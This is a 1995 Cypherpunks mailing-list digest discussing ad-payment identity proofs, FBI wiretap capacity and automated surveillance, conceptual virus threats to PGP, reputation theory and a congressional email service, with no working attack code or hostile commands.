From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 22 Nov 1995 02:51:44 +0800
Subject: Proving I'm not Bob.
Message-ID: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>


I had an idea for an advertising based net-payment scheme that has 
a particular security flaw making it totally untrustworthy unless it is
possible to prove that you are not a particular person (the publisher 
receiving the ad money) when consuming (viewing or otherwise) the ads.

All its other flaws seem to based on the same sort of identity denial 
problem. Damn!

Any protocols, cryptographic or otherwise?

TIA





From tcmay at got.net  Tue Nov 21 11:05:54 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 22 Nov 1995 03:05:54 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <acd75bfd090210044420@[205.199.118.202]>


At 4:05 PM 11/21/95, Peter Wayner wrote:
>Has anyone ever done the math on the FBI's new wire tapping
>proposals and determined whether they'll have enough agents to
>do all of the listening? Doesn't a court ordered wire tap
>require that people listen in and screen the recordings. Does
>this have to be in real time? I can't remember, but I think
>there is a fairly onerous evidentiary chain required to use this
>technology.
...

The manpower shortage can be solved by moving the listening step offshore,
perhaps to one of the Carribbean islands that processes credit card slips.

Even cheaper would be to subcontract out the listening to the relatively
impoverished, but well-educated and English-trained, former Soviet bloc
nations. For example, Romania or Bulgaria, or even Russia. They may still
have the old listening infrastructure in place, although I hear that Stasi
headquarters in the former DDR is now an acupuncture clinic.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From ian at virusbtn.com  Tue Nov 21 11:07:56 1995
From: ian at virusbtn.com (Ian Whalley)
Date: Wed, 22 Nov 1995 03:07:56 +0800
Subject: Virus attacks on PGP
In-Reply-To: <199511211743.JAA06639@ix8.ix.netcom.com>
Message-ID: <199511211832.SAA12002@elbereth.sophos.com>


>>Could a virus write to a write-protected disk?  I'm not sure if the
>>protection is done in the BIOS or the drive hardware.
>In the drive hardware.

In certain rare cases, drive hardware fails in such a way to allow
write access to write-protected diskettes - I have one such machine
here.  This appears to happen more often in 5.25" drives - perhaps
this is simply because most of the ones I come in contact with are
older than the 3.5" ones.

This is not a suitable viral attack, however, least of all against
a specific target like PGP.  However, viruses attacking specific
programs are well-known, both in concept and actuality - take
AntiEXE, which will corrupt certain sector reads if the sector
starts with a given byte pattern.  In a similar way it would be possible
to attack PGP, at least on DOS platforms.   However, it would be
dependent upon compiler used/version of PGP/etc etc, and only
work in a few cases.

More likely is something which waits to see when a certain program
is run (let's say PGP :-)), and records keystrokes (keyphrase,
anyone?).  Then it takes a copy of the secret key file along with
the keyphrase, and is able to do whatever it likes with them.

Slightly off-topic, for which I apologise, but there we go.

I.

---------------------------------------------------------------------
| Ian Whalley, Editor,   |    Phone/Fax : +44-1235-555139/531889    |
| Virus Bulletin,        |    DDI       : +44-1235-544039           |
| 21 The Quadrant,       |------------------------------------------|
| Abingdon Science Park, |    PGP key   :   2A 02 96 E5 5D 77 4C 8D |
| Oxon, OX14 3YS, UK.    |  fingerprint :   EB 22 14 6F E0 3B A0 D3 |
---------------------------------------------------------------------





From chen at intuit.com  Tue Nov 21 11:13:13 1995
From: chen at intuit.com (Mark Chen)
Date: Wed, 22 Nov 1995 03:13:13 +0800
Subject: Cyberpunk handbook [NOISE]
In-Reply-To: <199511210436.UAA26114@jobe.shell.portal.com>
Message-ID: <9511211827.AA27657@doom.intuit.com>



> You Bay Area people probably know all about this already, but I was
> browsing through the local bookstore yesterday and saw Eric Hughes,
> Cypherpunks co-founder, on the cover of the "Cyberpunk [sic] Handbook",
> a slim satirical volume by the Mondo 2000 people.  The book has more
> attitude than information, though.

Apart from the unfortunate choice of cover model :>, the book is
co-authored by Jude Milhon.

   - Mark -


--
Mark Chen 
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D





From anonymous-remailer at shell.portal.com  Tue Nov 21 11:31:56 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 22 Nov 1995 03:31:56 +0800
Subject: toolkits?
Message-ID: <199511211859.KAA20466@jobe.shell.portal.com>


Alice here ...

No, *I* am the real Alice, and I refuse to use PGP signing.

Alice de 'nonymous ...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From anon-remailer at utopia.hacktic.nl  Tue Nov 21 11:48:00 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 22 Nov 1995 03:48:00 +0800
Subject: toolkits?
Message-ID: <199511211927.UAA20586@utopia.hacktic.nl>


|Alice here ...
|
|No, *I* am the real Alice, and I refuse to use PGP signing.
|
|Alice de 'nonymous ...
|
|
|P.S.  This post is in the public domain.
|                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.


No, *I* am the real Alice, and *I* refuse to use PGP signing.

Alice de 'nonymous ...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From david at math.earlham.edu  Tue Nov 21 11:56:32 1995
From: david at math.earlham.edu (David Scheidt)
Date: Wed, 22 Nov 1995 03:56:32 +0800
Subject: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>


On Tue, 21 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

What is this system?  I can't think of any system that wouldn't work if 
rearranged so that instead of proving you aren't Bob, you simply don't 
prove that you are.  It is true that they are not isomorphic, and that 
could be a problem in some situations, but I don't see this as one of them.

david
--------
David_Scheidt at math.earlham.edu

yip yip yip yap yap yak yap yip *BANG*  -- no terrier







From dlv at bwalk.dm.com  Wed Nov 22 04:10:13 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 22 Nov 95 04:10:13 PST
Subject: Java & Netscape security [NOISE]
In-Reply-To: <199511221048.CAA26409@jobe.shell.portal.com>
Message-ID: <i6uyeD4w165w@bwalk.dm.com>


Alice de Nonymous writes:
> What I'm trying to say is that if someome posts from watson.ibm.com,
> and IF they are talking about OS/2, we will not accept that they are
> not speaking independantly of the knowledge they have garnered from
> watson.

I fully agree. I'm not arguing with you.

> In the same way, someone who writes from Netscape.com or AT&T, or Sun
> and tries to disclaim that they are speaking for the company, when
> they step out as an employee of a company is deluding themselves.

If you meant "disclaim that they are NOT speaking for the company", then that's
what I was saying too. Moreover, I think that if someone known to work for Sun
posts from Netcom about Sun products, policies, and future plans, s/he'll have
both higher credibility and higher responsibility to the readers than a
proverbial person from the street.

(Sorry for not being able to take this to e-mail.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From joshua at isappp.got.net  Tue Nov 21 12:17:05 1995
From: joshua at isappp.got.net (joshua geller)
Date: Wed, 22 Nov 1995 04:17:05 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <199511211948.LAA29791@isappp.got.net>


moroni at scranton.com writes:

 >    If you ask me if there is something for them to worry about I have to 
 > in all good conscience say yes , if you ask if there is something for us 
 > to worry about again I have to say yes. I don't know if there is even a 
 > common ground for both sides to work towards because terrorism has grown 
 > to include the homegrown variety .

what are you talking about? there has always been homegrown terrorism.
at various times in the past it has been much more intense than it is
now. read a little bit about the history of the labor movement in this
country (ie, in the united states of america).

josh





From ses at tipper.oit.unc.edu  Tue Nov 21 12:24:28 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Wed, 22 Nov 1995 04:24:28 +0800
Subject: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.SOL.3.91.951121115245.23025A-100000@chivalry>


On Tue, 21 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote:

> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

Obvious approach probably makes the rest of the protocol useless but...
If you force everything to be signed using keys corresponding to 
certificates issued by a trusted agency, that CA can be used to guarantee 
the inequality. 







From ethridge at Onramp.NET  Tue Nov 21 13:06:13 1995
From: ethridge at Onramp.NET (Allen B. Ethridge)
Date: Wed, 22 Nov 1995 05:06:13 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02130500acd7e7228be6@[199.1.154.51]>


In addition to the large quantity they want, they also want to be able to
deliver the conversation from a mobile suspect to mobile agents who are
following the suspect.  So even if you use a digital set with "voice
privacy" activated that government car behind you might still be listening
to you.

The FBI's "requirements" present an entertaining set of logistical
problems.  Simply equipping the switches to handle the extra capacity,
especially during busy hour, is problematic.

        allen







From ylo at cs.hut.fi  Tue Nov 21 13:39:27 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Wed, 22 Nov 1995 05:39:27 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <199511212053.VAA02472@trance.olari.clinet.fi>


> For instance, if 1% of America is on the phone during the peak
> hours of the day, then that puts 2.5 million Americans on the
> phone or 1.25 million conversations. If the FBI wants access to
> 1% of that, that is still 12,500 simulataneous conversations.
> That would seem to imply 12,500 people to listen to the tapes,
> right? Would that take agents off the streets?

On the other hand, if you only want to collect rough background
information about people who might become significant later, it is
enough to store the conversations in a computer (storage is orders of
magnitude cheaper than the man-time to listen to the tapes), and only
listen the tapes if the person becomes interesting.

Besides, computer technology is approaching the point where you can
eliminate the human from the link entirely, except for final
verification.

1. Speech recognition already works quite well.  There was an article
about a 20.000 word speaker-independent system a few years ago,
operating 1/7th of real time on an alpha workstation.

2. Automatic speaker recognition from voice works quite well if my
understanding is correct.  (Useful for picking up interesting
conversations for futher analysis when you get them from sources you
don't normally monitor).

3. Computers have been able to pick up potentially interesting
conversations by keywords for decades.  Also useful for picking up
interesting conversations for further analysis from sources you don't
monitor very actively.  (Of course, you can additionally use phone
numbers, mobile phone *phone* identification codes, etc.)

4. A lot of work is being done in classifying transcript based on
their content, on message understanding.  In other words, lot of the
analysis work can be automated now or in near future.  The computer
can then answer questions from the data and for example select
individuals for futher analysis based on complex criteria.

5. A lot of work is being done on data mining (i.e., finding new data
from small pieces of individual data in a database, such as purchase
logs, etc.).  This is one of the hot topics in database conferences
right now.

6. Research is being done in massive databases.  There was an
Intelligence Community research initiative a couple of years ago on
massive databases; if my memory serves me right, they were talking
about 2-3 *petabytes* (10^12) as the size of the final database (no,
it was not gigabytes and it was not terabytes).  I believe I still
have the announcement saved somewhere if somebody wants it.


All of these technologies are feasible now or in near future.

Then add a little spices: the hundreds of thousands of surveillance TV
cameras around (did you know that there is a computer system that can
recognize and look up 25 faces per second from a database of a million
faces - used to control football huligans and shoplifters for
instance, but has other uses as well), car movement records from
highway payment systems, purchase records obtained from
credit card companies, banks and retail chains, link up to medical
records, tax databases, employment records, etc.  Add full knowledge
of flight and other travel reservations, some fax, e-mail and telegram
intercepts.

Now, what have you got (besides effective tools for finding criminals)?

    Tatu





From ahupp at primenet.com  Tue Nov 21 13:45:53 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Wed, 22 Nov 1995 05:45:53 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511212106.OAA22450@usr1.primenet.com>


>Date: Tue, 21 Nov 1995 02:10:02 +0100
>From: Tatu Ylonen <ylo at cs.hut.fi>
>To: ahupp at primenet.com
>Cc: cypherpunks at toad.com
>Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
>
>> PKZIP allows encryption (other's ?).  How about a hook to that?
>
>PKZIP "encryption" is self-deception.  A program for cracking it,
>PKCRACK, is widely available on the internet.  See e.g.
>ftp.funet.fi:/pub/crypt/analysis.  
>
>[For information about internationally available cryptographic
>software, see http://www.cs.hut.fi/crypto.]
>
>    Tatu Ylonen <ylo at cs.hut.fi>

PKCRACK uses a dictionary attack. Anyway, my point was that you could use
PKZIP's encryption as an excuse for passing a password.






From dreschs at mpd.tandem.com  Tue Nov 21 13:56:01 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Wed, 22 Nov 1995 05:56:01 +0800
Subject: "Junk E-Mail"
In-Reply-To: <199511211647.RAA15185@utopia.hacktic.nl>
Message-ID: <199511212111.PAA12087@galil.austnsc.tandem.com>


nobody at REPLAY.COM (Anonymous) said:

A> Sten wrote:
>> They (as in, the government) has used the RICO laws against Operation
>> Rescue, an anti-abortion/pro-life (pick your term) group for
>> protesting/picketing abortion clinics and doctors who perform
>> abortions.

A>       And for successfully encouraging the murder of doctors.

	Sorry, but the RICO case had nothing to do with any of the
murders.  And if you're gonna go after OR&company for encouraging the
murder of doctors, I hope you're also going after certain rappers for
encouraging the murder of police.

>> If they had prosecuted under statutes which applied to everyone, I
>> wouldn't have had a problem, but they are going after OR and similar
>> organizations for using tactics similar to those used by civil rights
>> protesters in the 60s.

A>       Who were systematically arrested, beaten, teargassed,
A> wiretapped, and even occasionally shot at. I *know*--I got firehosed,
A> beaten, arrested, and wiretapped for what I did. That's why I'm a
A> Cypherpunk now.  OR has received far better treatment than the civil
A> rights protesters ever did--or did I miss the news items reporting
A> that Terry Randall and Ralph Reed had been assassinated, and that
A> their lieutenants had been bumped off in black-bag jobs, and that
A> their colleagues were chained down to chairs *in court*?

	And the treatment you received then was wrong.  Does that make
admittedly less violent treatment of OR&company right?  At risk of your
calling it a 'nursery rhyme', or something similarly trivializing, two
wrongs don't make a right.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From weidai at eskimo.com  Tue Nov 21 14:00:34 1995
From: weidai at eskimo.com (Wei Dai)
Date: Wed, 22 Nov 1995 06:00:34 +0800
Subject: towards a theory of reputation
Message-ID: <Pine.SUN.3.91.951121130450.19018A-100000@eskimo.com>


-----BEGIN PGP SIGNED MESSAGE-----

Many of the topics discussed on this list are economic in nature.  
Unfortunately cypherpunks haven't attracted the attention of professional 
economists who might be willing to apply their analytic tools to these 
issues.  Reputation is one of these issues that is especially important.  
I'm not an economist, so I hope these ramblings do not discourage real 
economists from tackling reputation as a serious research project.

The first step toward a theory of reputation is defining what reputation 
is.  The definition should correspond closely enough to our common sense
notion of reputation so that our intuitions about it are not completely 
useless.  I think a good definition is this: Alice's reputation of Bob is 
her expectation of the results of future interactions with Bob.  If 
these interactions are mainly economic in nature, then we can represent 
Alice's reputation of Bob by a graph with the horizontal axis labeled 
price and the vertical axis labeled expected utility.  A point (x,y) on 
the graph means that Alice expects to get y utils in a business transaction 
where she pays Bob x dollars.  Given this definition, it is natural to say 
the Bob's reputation is the set of all other people's reputations of Bob.

A reputation system consists of a set of entities, each of whom has a 
reputation and a method by which he changes his reputation of others.  
I believe the most important question for a theory of reputation to answer 
is what is a good method (reputation algorithm) by which a person changes 
his reputation of others.  A good reputation algorithm must serve his 
self-interest; it must not be (too) costly to evaluate; its results must 
be stable; a reputation system where most people use the algorithm must 
be stable (i.e., the reputation system must be an evolutionarily stable 
system).

In a reputation based market, each entity's reputation has three values.  
First is the present value of expected future profits, given the reputation 
(let's call it the operating value).  Note that the entity's reputation 
allows him to make positive economic profits, because it makes him a 
price-maker to some extent.  Second is the profit he could make if he 
threw away his reputation by cheating all of his customers (throw-away 
value).  Third is the expected cost of recreating an equivalent reputation 
if he threw away his current one (replacement cost).

Now it is clear that if a reputation's throw-away value ever exceeds its 
operating value or replacement cost, its owner will, in self-interest, 
throw away his reputation by cheating his customers.  In a stable reputation 
system, this should happen very infrequently.  This property may be 
difficult to achieve, however, because only the reputation's owner knows 
what its values are, and they may fluctuate widely.  For example the 
operating value may suddenly decrease when his competitor announces
a major price cut, or the replacement cost may suddenly decrease when 
he succeeds subverting a respected reputation agency.

One way to answer some of these questions may be to create a model of 
a reputation system with a simple reputation algorithm and a simplified 
market, and determine by analysis or simulation whether it has the 
desirable properties.  I hope someone who has an economist friend can 
persuade him to do this.

Wei Dai

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLI9Ujl0sXKgdnV5AQECCQQAiHq+s3PfsEOJmk0ng9aETQwHVe5EvrA0
+0wimcO2IGf+Bix8J/bLtAlW2eEcXM90pMvBgv+Q4jTkvI5RvGyuMf5cvOgj6rTz
wj9aCqoltjHm/l1dfoWWCn4VSIU8OAJ6wKN/HRANQ5B56TPOgEkS2EDSM2C3w4m9
BgwcG5rBeA8=
=taTA
-----END PGP SIGNATURE-----






From hallam at w3.org  Tue Nov 21 14:41:33 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 22 Nov 1995 06:41:33 +0800
Subject: "Dear Newt" Letter...
In-Reply-To: <199511210028.TAA15346@jekyll.piermont.com>
Message-ID: <9511210055.AA29106@zorch.w3.org>



>Er, Newt was the one who railed against the Exon censorship bill, and
>who's said in public that clipper is unrealistic.

And where does that get us? Did Newt stop the Exon bill in its tracks?
Did he do anything to stop the wiretap bill?

If Newt is all stewed up then how come there isn't a provision in his
budget bill to force these laws to be dismantled the same way that there
are provisions on just about every other part of his agenda?

Face it, Newt may speak from the heart, but he acts from his pocket.

We haven't put enough into his back pocket to get attention.

	Phill





From futplex at pseudonym.com  Tue Nov 21 14:53:16 1995
From: futplex at pseudonym.com (Futplex)
Date: Wed, 22 Nov 1995 06:53:16 +0800
Subject: Proving I'm not Bob.
In-Reply-To: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>
Message-ID: <199511212210.RAA11334@thor.cs.umass.edu>


s1113645 at tesla.cc.uottawa.ca writes:
> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

david writes:
> What is this system?  I can't think of any system that wouldn't work if 
> rearranged so that instead of proving you aren't Bob, you simply don't 
> prove that you are.  It is true that they are not isomorphic, and that 
> could be a problem in some situations, but I don't see this as one of them.

I don't know what particular scheme s1113645 has in mind. But as you point
out, not proving P is very different from proving not-P. Generally, a scheme
that charges for advertising based upon the measured number of accesses to
the advertising has the kind of authentication problem mentioned above. The
party paying for the advertising only wants to pay to reach "legitimate" 
customers. A dishonest publisher (selling ad space) could access the
advertising many times herself to artificially inflate the access figures,
justifying higher advertising charges. 

To avoid paying for this "illegitimate" traffic, the advertiser would like to
authenticate the accesses as *not* coming from the untrusted publisher. This
is a hard problem in general, because the advertiser really wants to discount 
accesses by the publisher, her agents, her family, her friends, etc. It's
tough to prove that you're not working for someone else at a formal protocol
level.

(Note that widespread "legitimate" anonymous accesses of material can
severely damage the reliability of these kinds of measurement-based payment
schemes.)

I think this thread is rapidly straying from cpunks relevance....

-Futplex <futplex at pseudonym.com>





From hfinney at shell.portal.com  Tue Nov 21 15:07:41 1995
From: hfinney at shell.portal.com (Hal)
Date: Wed, 22 Nov 1995 07:07:41 +0800
Subject: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511212233.OAA16781@jobe.shell.portal.com>


s1113645 at tesla.cc.uottawa.ca writes:

>I had an idea for an advertising based net-payment scheme that has 
>a particular security flaw making it totally untrustworthy unless it is
>possible to prove that you are not a particular person (the publisher 
>receiving the ad money) when consuming (viewing or otherwise) the ads.

BTW, we had some interesting postings here last year from Jason Solinsky
(solman at mit.edu) about schemes involving advertising and payment, where
people would get paid to view advertisements.  Is this the kind of thing
you're thinking of?

I posted some ideas once on how to prove that you are not someone else.
Any such scheme has to be grounded in a physical mechanism to determine that
two people are different.  For example, you might be able to get some
special cryptographic signature or credential from an agency by showing
some biometric information, such as retina or thumb prints.  You wouldn't
necessarily have to reveal your name, identity, or any other information;
just something which would allow the agency to be sure that they had not
given such a credential out to you before.

If you didn't care about privacy, your problem could then be solved
simply by having each person exhibit his credential (these are often
called "is-a-person" credentials).  The more interesting question then
becomes exhibiting that credential in a privacy protecting way, but
still being able to tell if two people are showing the same or
different credentials.

There are various ways of doing this; one of the simplest would be for
the agency to give you a blind signature using a particular exponent,
where you would be allowed exactly one of each exponent.  You unblind
these, and to show you aren't Bob both you and Bob show your signatures
for some matching exponent, which will be different.  Because of the
blinding, no one will link the credential to your identifying
information, and because it is a signature from the agency, no one can
forge a credential different from the one they have.

Depending on the situation and your tradeoffs between convenience and
privacy, you might discard used credentials (for maximum privacy), or
you might reuse them in a particular forum where you have persistent
identity (for maximum convenience).  In the latter case, the exponent
used could be associated with the forum, which is the idea behind
Chaum's pseudonym system.

Hal Finney
hfinney at shell.portal.com





From fair at clock.org  Tue Nov 21 15:24:04 1995
From: fair at clock.org (Erik E. Fair (Time Keeper))
Date: Wed, 22 Nov 1995 07:24:04 +0800
Subject: "The Right To Privacy" by Caroline Kennedy, et. al.
Message-ID: <v02110118acd807aa64e2@[198.68.110.3]>


In an EPIC Alert on 10:46 10/23/95, Dave Banisar wrote:

>"The Right to Privacy," November 9.  Authors Caroline Kennedy and Ellen
>Alderman discuss their new book on privacy.  Lizner Auditorium, George
>Washington University, Washington, DC.  Contact 202/357-3030.

Did anyone here go to this event, or has read the book yet? There is a
review of it in TIME magazine at this URL:

http://pathfinder.com/@@iEPVLuF5EgMAQChZ/time/magazine/domestic/1995/951106/
publishing.html

thanks,

Erik Fair







From frantz at netcom.com  Tue Nov 21 15:59:27 1995
From: frantz at netcom.com (Bill Frantz)
Date: Wed, 22 Nov 1995 07:59:27 +0800
Subject: Virus attacks on PGP
Message-ID: <199511212326.PAA06093@netcom8.netcom.com>


At  8:34 11/21/95 -0500, SINCLAIR  DOUGLAS N wrote:
>> Certainly having PGP run from a CDROM or other read-only device would be a
>> big help.  Even better would be to have all the privileged code also run
>> from a read-only device.
>
>Seeing as PGP is quite small the simplest and cheapest read-only device
>would be a write-protected floppy disk.

But do remember that your copy of PGP could be infected as it is loaded
from the disk.  You really need to protect your privileged code too.

Bill







From carolann at censored.org  Tue Nov 21 16:02:02 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Wed, 22 Nov 1995 08:02:02 +0800
Subject: The Congressional Mailbot
Message-ID: <199511212318.QAA26412@mailhost1.primenet.com>


Here's your chance to protest ITAR and 
whatever other CPUNK thing you feel worthwile.
Enjoy!


CONGRESSIONAL MAILBOT SERVICE

This service is provided to make it easy for you to get your message to
all members of the House or Senate that have E-Mail mailboxes.  By sending
a single message to the service addressed at HOUSE at MAILBOT.COM and/or
SENATE at MAILBOT.COM, your single message will be expanded and resent to all
members of those specified houses as if YOU had E-Mailed each and everyone
of them yourself.

Any E-Mail responses to your inquiries will be sent directly back to your
own E-Mail box.

WHERE DO I SEND MY E-MAIL TO MAKE THIS HAPPEN?

In order to use this service, you need to address your E-Mail to one or
both of the addresses listed below.

FOR MEMBERS OF TU          House at Mailbot.com
FOR MEMBERS OF THE US SENATE:
         Senate at Mailbot.com

WHO WILL RECEIVE THIS E-MAIL?

Your incoming message is sent to all currently known members of congress
that have E-Mail mailboxes.  The Congressional Mailbot System updates it's
list of members of both the Houses every 30 days.  At that time, new email
addresses are added to the Mailbot Server.


WHAT TO INCLUDE IN YOUR MESSAGE?

Most members of congress do not have the staff to deal with replies via
both regular mail and E-Mail.  Most would prefer to reply to your specific
request by way of regular postal mail.  In order for them to do that, you
need to include your NAME, ADDRESS, CITY & STATE so that they can send you
a response.


WHAT NOT TO INCLUDE IN YOUR MESSAGE?

Basically, your message should be short and to the point.  It is not wise
to include large amounts of text from other sources.  If you want to point
out to them about such sources, simply tell them where you saw it.
Imagine getting hundreds of email messages containing the same material
over and over.  The meaning gets lost.  Make your message clear and easy
to read.

WARNING

Each member of the House or Senate which receives a message from you via
the Mailbot, will respond with a reply message.

           THIS CAN GENERATE A LOT OF EMAIL INTO YOUR MAILBOX.

If for example, at the time you send your request to the Mailbot, there
are 130 members of the specific house you select, you will get back 130
reply messages from those members when they receive your message.
Currently, the automatic replies are about 750 bytes in size and only
contain a header with no message body.

These replies are sent to let you know that the Congress Person you sent
the message to, has received it in their E-Mailbox.

Some users use systems that only allow so much email per month for free
and then charge for email sent/received after that!


IF YOU CANNOT HAVE THIS AMOUNT OF TRAFFIC IN YOUR MAILBOX
PLEASE DO NOT USE THIS SERVICE!


WHAT IF I WANT TO SEND A MESSAGE TO A SPECIFIC Congress Persons?

THEN YOU SHOULD NOT USE THIS SERVICE!  This service is for E-Mail intended
for ALL members of the House and/or Senate.  Individual messages to
specific Congress Persons should be sent by other means.


LIMITATIONS:

This is a very popular tool....  Several rules need to be enforced to
ensure that this service does not overburden the systems that are
connected to it.  The following rules are in place...

    1 The Mailbot will reject any message that is larger than 5,000 bytes
in size.  This provides you with a total of 66 lines of 80 columns per
line for your message which is a whole page of information to make your
point.

    2 Please limit usage of the mailbot to no more than one message per 72
hour period (one each to HOUSE and SENATE is ok).

    3 Abusive and obscene messages violate the purpose and spirit of this
service and WILL place the originator of such messages on a rejection
list.

Users who cannot abide by the above limitations will be placed permanently
on a rejection list and all further attempts to use the service will
result that user's messages being rejected by the service.

PROBLEMS OR QUESTIONS?

If you have any problems or questions about this service, please direct
them to the following E-Mail address:  Mailbot at Mailbot.Com

TELL A FRIEND?

If you should tell a friend or colleague about this service, PLEASE
INCLUDE THIS MESSAGE.  This will save them time in knowing what is
permitted and will keep questions about the service down to a minimum.


This Service is Provided By:
                       MAILBOT SERVICES OF ARIZONA
                       (c) 1995 Mailbot Services of Arizona.
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From hfinney at shell.portal.com  Tue Nov 21 16:09:13 1995
From: hfinney at shell.portal.com (Hal)
Date: Wed, 22 Nov 1995 08:09:13 +0800
Subject: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121130450.19018A-100000@eskimo.com>
Message-ID: <199511212332.PAA24563@jobe.shell.portal.com>


Wei Dai <weidai at eskimo.com> writes:

>The first step toward a theory of reputation is defining what reputation 
>is.  The definition should correspond closely enough to our common sense
>notion of reputation so that our intuitions about it are not completely 
>useless.  I think a good definition is this: Alice's reputation of Bob is 
>her expectation of the results of future interactions with Bob.  If 
>these interactions are mainly economic in nature, then we can represent 
>Alice's reputation of Bob by a graph with the horizontal axis labeled 
>price and the vertical axis labeled expected utility.  A point (x,y) on 
>the graph means that Alice expects to get y utils in a business transaction 
>where she pays Bob x dollars.  Given this definition, it is natural to say 
>the Bob's reputation is the set of all other people's reputations of Bob.

This is an interesting approach.  However this seems to fold in issues of
reliability with issues of quality and value.  If I have a choice of two
vendors, one of whom produces a product which is twice as good, but there
is a 50% chance that he will abscond with my money, I am not sure how to
value him compared with the other.  It seems like the thrust of the
analysis later is to determine whether people will in fact try to
disappear.  But that is not well captured IMO by an analysis which just
ranks people in terms of "utility" for the price.

>A reputation system consists of a set of entities, each of whom has a 
>reputation and a method by which he changes his reputation of others.  
>I believe the most important question for a theory of reputation to answer 
>is what is a good method (reputation algorithm) by which a person changes 
>his reputation of others.  A good reputation algorithm must serve his 
>self-interest; it must not be (too) costly to evaluate; its results must 
>be stable; a reputation system where most people use the algorithm must 
>be stable (i.e., the reputation system must be an evolutionarily stable 
>system).

I am not sure about this last point.  It seems to me that a good
reputation is one which is most cost-effective for its owner.  Whether it
is good for social stability is not relevant to the person who is
deciding whether to use it.  ("But what if everyone behaved that way?
How would you feel then?")  It may be nice for the analyst but not for
the participant.

>In a reputation based market, each entity's reputation has three values.  
>First is the present value of expected future profits, given the reputation 
>(let's call it the operating value).  Note that the entity's reputation 
>allows him to make positive economic profits, because it makes him a 
>price-maker to some extent.  Second is the profit he could make if he 
>threw away his reputation by cheating all of his customers (throw-away 
>value).  Third is the expected cost of recreating an equivalent reputation 
>if he threw away his current one (replacement cost).

I don't really know what the first one means.  There are a lot of
different ways I can behave, which will have impact on my reputation, but
also on my productivity, income, etc.  There are other ways I can damage
my reputation than by cheating, too.  I can be sloppy or careless or just
not work very hard.  So the first two are really part of a continuum of
various strategies I may apply in life.  The second is pretty clear but
the first seems to cover too wide a range to give it a value.

>Now it is clear that if a reputation's throw-away value ever exceeds its 
>operating value or replacement cost, its owner will, in self-interest, 
>throw away his reputation by cheating his customers.  In a stable reputation 
>system, this should happen very infrequently.  This property may be 
>difficult to achieve, however, because only the reputation's owner knows 
>what its values are, and they may fluctuate widely.  For example the 
>operating value may suddenly decrease when his competitor announces
